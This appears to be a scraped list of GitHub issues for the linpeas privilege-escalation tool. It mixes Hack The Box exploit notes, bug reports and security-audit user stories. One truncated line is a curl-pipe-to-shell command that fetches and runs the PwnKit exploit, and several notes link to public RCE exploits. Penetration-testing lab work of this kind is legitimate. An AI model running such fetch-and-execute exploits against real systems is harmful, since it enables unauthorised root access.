-
Keypoints:
- Redis 4.x / 5.x --> https://github.com/jas502n/Redis-RCE
- [PE] PwnKit --> https://github.com/ly4k/PwnKit
- -` sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/…
-
If you are going to suggest something, please remove the following template.
#### Issue description
While running this on an HTB machine I get this error, if I comment that line out it just chang…
-
#### Issue description
I would like linpeas to try to bruteforce su but it just tells me "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I…
-
Keypoints:
- [PluXml Blog 5.8.9 Remote Code Execution](https://packetstormsecurity.com/files/176407/PluXml-Blog-5.8.9-Remote-Code-Execution.html)
- [PE] root credential info is in /var/mail/www-data…
-
-
As a SCS security auditor, I want to check and assess a SCS testbed deployment within the context of a low privileged user on both manager and nodes, so that I could report that all systems are config…
90n20 updated
6 months ago
-
As a SCS security auditor, I want to check and assess a SCS testbed deployment within the context of a high privileged user on both manager and nodes, so that I could report that all systems are confi…
90n20 updated
6 months ago
-
I was doing the HackTheBox box "Paper", which uses the polkit CVE-2021-3560 for privilege escalation.
In the walkthrough for this box, linpeas suggests the CVE in the `CVEs Check` section with a re…
-
-
Keypoints:
- HTMLAWED 1.2.5--> https://www.exploit-db.com/exploits/52023 (htmlLawed 1.2.5 - Remote Code Execution (RCE))
- [PE]Use pspy64